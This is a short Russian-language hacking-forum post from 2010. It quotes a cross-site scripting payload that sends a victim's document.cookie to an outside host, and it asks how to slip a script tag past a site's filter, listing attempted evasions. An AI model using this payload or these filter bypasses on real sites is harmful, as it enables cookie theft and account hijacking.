Показать сообщение отдельно

  #9  
Старый 10.01.2010, 06:24
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Цитата:
Сообщение от .:[melkiy]:.  
создай на своём хосте 1.js в него впиши
PHP код:
 img=new Image(); img.src="http://site.ru/image.gif?"+document.cookie
ну и где ты там нашел xss впиши :

PHP код:
<script src=http://site.ru/1.js></script> 
Скрипт не позволяет использовать значения <script в любом регистре, причём он его не проглатывает, а именно не пропускает эту информацию выдавая ошибку. (поэтому не надо предлогать варианты типа <scri<script>pt>)
Я пробовал <scr<!-- -->ipt>, так он пропускает, но код становится не рабочим (хотя в манах по XSS такой способ рекомендовали), может быть я не так HTML коментарий использую?

Поправка:
Останавливает передачу, если замечено значение <script (вместе с одной ковычкой), без ковычек пропускает спокойно, такое значение script> или </script> тоже спокойно пропускает. На регистр так-же не обращяет внимание.
Очень надеюсь на помощь, и разумный ответ.

Последний раз редактировалось Nightmarе; 10.01.2010 в 11:38..
 
Ответить с цитированием